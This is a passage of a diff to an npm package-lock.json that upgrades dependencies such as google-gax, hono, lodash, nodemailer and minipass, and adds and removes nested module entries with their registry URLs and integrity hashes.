"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", @@ -17529,15 +17386,6 @@ "url": "https://github.com/sponsors/isaacs" } }, - "node_modules/glob/node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "license": "ISC", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/globals": { "version": "13.23.0", "resolved": "https://registry.npmjs.org/globals/-/globals-13.23.0.tgz", @@ -17617,54 +17465,136 @@ } }, "node_modules/google-gax": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-4.4.1.tgz", - "integrity": "sha512-Phyp9fMfA00J3sZbJxbbB4jC55b7DBjE3F6poyL3wKMEBVKA79q6BGuHcTiM28yOzVql0NDbRL8MLLh8Iwk9Dg==", + "version": "5.0.6", + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-5.0.6.tgz", + "integrity": "sha512-1kGbqVQBZPAAu4+/R1XxPQKP0ydbNYoLAr4l0ZO2bMV0kLyLW4I1gAk++qBLWt7DPORTzmWRMsCZe86gDjShJA==", "license": "Apache-2.0", "dependencies": { - "@grpc/grpc-js": "^1.10.9", - "@grpc/proto-loader": "^0.7.13", - "@types/long": "^4.0.0", - "abort-controller": "^3.0.0", - "duplexify": "^4.0.0", - "google-auth-library": "^9.3.0", - "node-fetch": "^2.7.0", + "@grpc/grpc-js": "^1.12.6", + "@grpc/proto-loader": "^0.8.0", + "duplexify": "^4.1.3", + "google-auth-library": "^10.1.0", + "google-logging-utils": "^1.1.1", + "node-fetch": "^3.3.2", "object-hash": "^3.0.0", - "proto3-json-serializer": "^2.0.2", - "protobufjs": "^7.3.2", - "retry-request": "^7.0.0", - "uuid": "^9.0.1" + "proto3-json-serializer": "^3.0.0", + "protobufjs": "^7.5.3", + "retry-request": "^8.0.0", + "rimraf": "^5.0.1" }, "engines": { - "node": ">=14" + "node": ">=18" } }, - "node_modules/google-gax/node_modules/@types/long": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz", - "integrity": "sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==", - "license": "MIT" - }, - "node_modules/google-gax/node_modules/object-hash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", - "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "node_modules/google-gax/node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", "license": "MIT", "engines": { - "node": ">= 6" + "node": ">= 14" } }, - "node_modules/google-gax/node_modules/uuid": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", - "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", - "funding": [ - "https://github.com/sponsors/broofa", - "https://github.com/sponsors/ctavan" - ], - "license": "MIT", - "bin": { - "uuid": "dist/bin/uuid" + "node_modules/google-gax/node_modules/debug": { + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/google-gax/node_modules/gaxios": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-7.1.4.tgz", + "integrity": "sha512-bTIgTsM2bWn3XklZISBTQX7ZSddGW+IO3bMdGaemHZ3tbqExMENHLx6kKZ/KlejgrMtj8q7wBItt51yegqalrA==", + "license": "Apache-2.0", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "node-fetch": "^3.3.2" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/google-gax/node_modules/gcp-metadata": { + "version": "8.1.2", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-8.1.2.tgz", + "integrity": "sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==", + "license": "Apache-2.0", + "dependencies": { + "gaxios": "^7.0.0", + "google-logging-utils": "^1.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/google-gax/node_modules/google-auth-library": { + "version": "10.6.2", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-10.6.2.tgz", + "integrity": "sha512-e27Z6EThmVNNvtYASwQxose/G57rkRuaRbQyxM2bvYLLX/GqWZ5chWq2EBoUchJbCc57eC9ArzO5wMsEmWftCw==", + "license": "Apache-2.0", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^7.1.4", + "gcp-metadata": "8.1.2", + "google-logging-utils": "1.1.3", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/google-gax/node_modules/https-proxy-agent": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/google-gax/node_modules/node-fetch": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-3.3.2.tgz", + "integrity": "sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==", + "license": "MIT", + "dependencies": { + "data-uri-to-buffer": "^4.0.0", + "fetch-blob": "^3.1.4", + "formdata-polyfill": "^4.0.10" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/node-fetch" + } + }, + "node_modules/google-gax/node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "license": "MIT", + "engines": { + "node": ">= 6" } }, "node_modules/google-logging-utils": { @@ -17906,9 +17836,9 @@ } }, "node_modules/hono": { - "version": "4.12.9", - "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.9.tgz", - "integrity": "sha512-wy3T8Zm2bsEvxKZM5w21VdHDDcwVS1yUFFY6i8UobSsKfFceT7TOwhbhfKsDyx7tYQlmRM5FLpIuYvNFyjctiA==", + "version": "4.12.12", + "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.12.tgz", + "integrity": "sha512-p1JfQMKaceuCbpJKAPKVqyqviZdS0eUxH9v82oWo1kb9xjQ5wA6iP3FNVAPDFlz5/p7d45lO+BpSk1tuSZMF4Q==", "license": "MIT", "engines": { "node": ">=16.9.0" @@ -18303,22 +18233,6 @@ "node": ">= 0.10" } }, - "node_modules/is-arguments": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/is-arguments/-/is-arguments-1.2.0.tgz", - "integrity": "sha512-7bVbi0huj/wrIAOzb8U1aszg9kdi3KN/CyU19CTI7tAoZYEZoL9yCDXpbXN+uPsuWnP02cyug1gleqq+TU+YCA==", - "license": "MIT", - "dependencies": { - "call-bound": "^1.0.2", - "has-tostringtag": "^1.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, "node_modules/is-array-buffer": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.2.tgz", @@ -18452,25 +18366,6 @@ "node": ">=8" } }, - "node_modules/is-generator-function": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.1.2.tgz", - "integrity": "sha512-upqt1SkGkODW9tsGNG5mtXTXtECizwtS2kA161M+gJPc1xdb/Ax629af6YrTwcOeQHbewrPNlE5Dx7kzvXTizA==", - "license": "MIT", - "dependencies": { - "call-bound": "^1.0.4", - "generator-function": "^2.0.0", - "get-proto": "^1.0.1", - "has-tostringtag": "^1.0.2", - "safe-regex-test": "^1.1.0" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, "node_modules/is-glob": { "version": "4.0.3", "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", @@ -18600,6 +18495,7 @@ "version": "1.2.1", "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.2.1.tgz", "integrity": "sha512-MjYsKHO5O7mCsmRGxWcLWheFqN9DJ/2TmngvjKXihe6efViPqc274+Fx/4fYj/r03+ESvBdTXK0V6tA3rgez1g==", + "dev": true, "license": "MIT", "dependencies": { "call-bound": "^1.0.2", @@ -18694,18 +18590,6 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/is-unicode-supported": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/is-unicode-supported/-/is-unicode-supported-1.3.0.tgz", - "integrity": "sha512-43r2mRvz+8JRIKnWJ+3j8JtjRKZ6GmjzfaE/qiBJnikNnYv/6bagRJ1kUhNk8R5EX/GkobD+r+sfxCPJsiKBLQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/is-weakref": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/is-weakref/-/is-weakref-1.0.2.tgz", @@ -18805,14 +18689,6 @@ "jiti": "lib/jiti-cli.mjs" } }, - "node_modules/jmespath": { - "version": "0.16.0", - "resolved": "https://registry.npmjs.org/jmespath/-/jmespath-0.16.0.tgz", - "integrity": "sha512-9FzQjJ7MATs1tSpnco1K6ayiYE3figslrXA72G2HQ/n76RzvYlofyi5QM+iX4YRs/pu3yzxlVQSST23+dMDknw==", - "engines": { - "node": ">= 0.6.0" - } - }, "node_modules/jose": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", @@ -19572,9 +19448,9 @@ } }, "node_modules/lodash": { - "version": "4.17.23", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.23.tgz", - "integrity": "sha512-LgVTMpQtIopCi79SJeDiP0TfWi5CNEc/L/aRdTh3yIvmZXTnheWpKjSZhnvMl8iXbC1tFg9gdHHDMLoV7CnG+w==", + "version": "4.18.1", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz", + "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==", "license": "MIT" }, "node_modules/lodash.camelcase": { @@ -19659,22 +19535,6 @@ "resolved": "https://registry.npmjs.org/lodash.sortby/-/lodash.sortby-4.7.0.tgz", "integrity": "sha512-HDWXG8isMntAyRF5vZ7xKuEvOhT4AhlRt/3czTSjvGUxjYCBVRQY48ViDHyfYz9VIoBkW4TMGQNapx+l3RUwdA==" }, - "node_modules/log-symbols": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/log-symbols/-/log-symbols-5.1.0.tgz", - "integrity": "sha512-l0x2DvrW294C9uDCoQe1VSU4gf529FkSZ6leBl4TiqZH/e+0R7hSfHQBNut2mNygDgHwvYHfFLn6Oxb3VWj2rA==", - "dev": true, - "dependencies": { - "chalk": "^5.0.0", - "is-unicode-supported": "^1.1.0" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/logform": { "version": "2.6.1", "resolved": "https://registry.npmjs.org/logform/-/logform-2.6.1.tgz", @@ -19793,15 +19653,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/make-fetch-happen/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/make-fetch-happen/node_modules/negotiator": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-1.0.0.tgz", @@ -19938,15 +19789,6 @@ "node": ">= 0.6" } }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, "node_modules/mimic-function": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/mimic-function/-/mimic-function-5.0.1.tgz", @@ -19979,6 +19821,17 @@ "node": "*" } }, + "node_modules/minimatch/node_modules/brace-expansion": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.13.tgz", + "integrity": "sha512-9ZLprWS6EENmhEOpjCYW2c8VkmOvckIJZfkr7rBW6dObmfgJ/L1GpSYW5Hpo9lDz4D1+n0Ckz8rU7FwHDQiG/w==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", @@ -19988,11 +19841,12 @@ } }, "node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", + "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", + "license": "BlueOak-1.0.0", "engines": { - "node": ">=8" + "node": ">=16 || 14 >=14.17" } }, "node_modules/minipass-collect": { @@ -20007,15 +19861,6 @@ "node": ">=16 || 14 >=14.17" } }, - "node_modules/minipass-collect/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/minipass-fetch": { "version": "5.0.2", "resolved": "https://registry.npmjs.org/minipass-fetch/-/minipass-fetch-5.0.2.tgz", @@ -20050,27 +19895,6 @@ "url": "https://opencollective.com/express" } }, - "node_modules/minipass-fetch/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minipass-fetch/node_modules/minizlib": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.1.0.tgz", - "integrity": "sha512-KZxYo1BUkWD2TVFLr0MQoM8vUUigWD3LlD83a/75BqC+4qE0Hb1Vo5v1FgcfaNXvfXzr+5EhQ6ing/CaBijTlw==", - "license": "MIT", - "dependencies": { - "minipass": "^7.1.2" - }, - "engines": { - "node": ">= 18" - } - }, "node_modules/minipass-flush": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/minipass-flush/-/minipass-flush-1.0.7.tgz", @@ -20131,47 +19955,16 @@ "node": ">=8" } }, - "node_modules/minipass-sized/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/minizlib/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.1.0.tgz", + "integrity": "sha512-KZxYo1BUkWD2TVFLr0MQoM8vUUigWD3LlD83a/75BqC+4qE0Hb1Vo5v1FgcfaNXvfXzr+5EhQ6ing/CaBijTlw==", + "license": "MIT", "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "bin": { - "mkdirp": "bin/cmd.js" + "minipass": "^7.1.2" }, "engines": { - "node": ">=10" + "node": ">= 18" } }, "node_modules/mlly": { @@ -20692,15 +20485,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/node-gyp/node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=18" - } - }, "node_modules/node-gyp/node_modules/isexe": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-4.0.0.tgz", @@ -20710,56 +20494,19 @@ "node": ">=20" } }, - "node_modules/node-gyp/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", + "node_modules/node-gyp/node_modules/nopt": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-9.0.0.tgz", + "integrity": "sha512-Zhq3a+yFKrYwSBluL4H9XP3m3y5uvQkB/09CwDruCiRmR/UJYnn9W4R48ry0uGC70aeTPKLynBtscP9efFFcPw==", + "license": "ISC", + "dependencies": { + "abbrev": "^4.0.0" + }, + "bin": { + "nopt": "bin/nopt.js" + }, "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/node-gyp/node_modules/minizlib": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.1.0.tgz", - "integrity": "sha512-KZxYo1BUkWD2TVFLr0MQoM8vUUigWD3LlD83a/75BqC+4qE0Hb1Vo5v1FgcfaNXvfXzr+5EhQ6ing/CaBijTlw==", - "license": "MIT", - "dependencies": { - "minipass": "^7.1.2" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/node-gyp/node_modules/nopt": { - "version": "9.0.0", - "resolved": "https://registry.npmjs.org/nopt/-/nopt-9.0.0.tgz", - "integrity": "sha512-Zhq3a+yFKrYwSBluL4H9XP3m3y5uvQkB/09CwDruCiRmR/UJYnn9W4R48ry0uGC70aeTPKLynBtscP9efFFcPw==", - "license": "ISC", - "dependencies": { - "abbrev": "^4.0.0" - }, - "bin": { - "nopt": "bin/nopt.js" - }, - "engines": { - "node": "^20.17.0 || >=22.9.0" - } - }, - "node_modules/node-gyp/node_modules/tar": { - "version": "7.5.13", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.5.13.tgz", - "integrity": "sha512-tOG/7GyXpFevhXVh8jOPJrmtRpOTsYqUIkVdVooZYJS/z8WhfQUX8RJILmeuJNinGAMSu1veBr4asSHFt5/hng==", - "license": "BlueOak-1.0.0", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.1.0", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" + "node": "^20.17.0 || >=22.9.0" } }, "node_modules/node-gyp/node_modules/which": { @@ -20777,15 +20524,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/node-gyp/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=18" - } - }, "node_modules/node-releases": { "version": "2.0.23", "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.23.tgz", @@ -20794,9 +20532,9 @@ "license": "MIT" }, "node_modules/nodemailer": { - "version": "7.0.13", - "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-7.0.13.tgz", - "integrity": "sha512-PNDFSJdP+KFgdsG3ZzMXCgquO7I6McjY2vlqILjtJd0hy8wEvtugS9xKRF2NWlPNGxvLCXlTNIae4serI7dinw==", + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-8.0.5.tgz", + "integrity": "sha512-0PF8Yb1yZuQfQbq+5/pZJrtF6WQcjTd5/S4JOHs9PGFxuTqoB/icwuB44pOdURHJbRKX1PPoJZtY7R4VUoCC8w==", "license": "MIT-0", "engines": { "node": ">=6.0.0" @@ -21322,6 +21060,35 @@ "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-22.2.0.tgz", "integrity": "sha512-QBhVjcUa9W7Wwhm6DBFu6ZZ+1/t/oYxqc2tp81Pi41YNuJinbFRx8B133qVOrAaBbF7D/m0Et6f9/pZt9Rc+tg==" }, + "node_modules/octokit-auth-probot/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/octokit-auth-probot/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/octokit-auth-probot/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/octokit-auth-probot/node_modules/lru-cache": { "version": "10.4.3", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", @@ -21418,21 +21185,6 @@ "fn.name": "1.x.x" } }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/open": { "version": "10.1.1", "resolved": "https://registry.npmjs.org/open/-/open-10.1.1.tgz", @@ -21534,29 +21286,6 @@ "node": ">= 0.8.0" } }, - "node_modules/ora": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/ora/-/ora-7.0.1.tgz", - "integrity": "sha512-0TUxTiFJWv+JnjWm4o9yvuskpEJLXTcng8MJuKd+SzAzp2o+OP3HWqNhB4OdJRt1Vsd9/mR0oyaEYlOnL7XIRw==", - "dev": true, - "dependencies": { - "chalk": "^5.3.0", - "cli-cursor": "^4.0.0", - "cli-spinners": "^2.9.0", - "is-interactive": "^2.0.0", - "is-unicode-supported": "^1.3.0", - "log-symbols": "^5.1.0", - "stdin-discarder": "^0.1.0", - "string-width": "^6.1.0", - "strip-ansi": "^7.1.0" - }, - "engines": { - "node": ">=16" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/oracledb": { "version": "6.4.0", "resolved": "https://registry.npmjs.org/oracledb/-/oracledb-6.4.0.tgz", @@ -21669,17 +21398,6 @@ "node": ">=8" } }, - "node_modules/p-throttle": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/p-throttle/-/p-throttle-5.1.0.tgz", - "integrity": "sha512-+N+s2g01w1Zch4D0K3OpnPDqLOKmLcQ4BvIFq3JC0K29R28vUOjWpO+OJZBNt8X9i3pFCksZJZ0YXkUGjaFE6g==", - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/p-timeout": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-3.2.0.tgz", @@ -21861,9 +21579,9 @@ } }, "node_modules/path-expression-matcher": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.2.0.tgz", - "integrity": "sha512-DwmPWeFn+tq7TiyJ2CxezCAirXjFxvaiD03npak3cRjlP9+OjTmSy1EpIrEbh+l6JgUundniloMLDQ/6VTdhLQ==", + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz", + "integrity": "sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==", "funding": [ { "type": "github", @@ -22594,6 +22312,12 @@ "node": ">=18" } }, + "node_modules/probot/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, "node_modules/probot/node_modules/@octokit/plugin-retry": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/@octokit/plugin-retry/-/plugin-retry-6.0.1.tgz", @@ -22626,6 +22350,29 @@ "@octokit/core": "^5.0.0" } }, + "node_modules/probot/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": 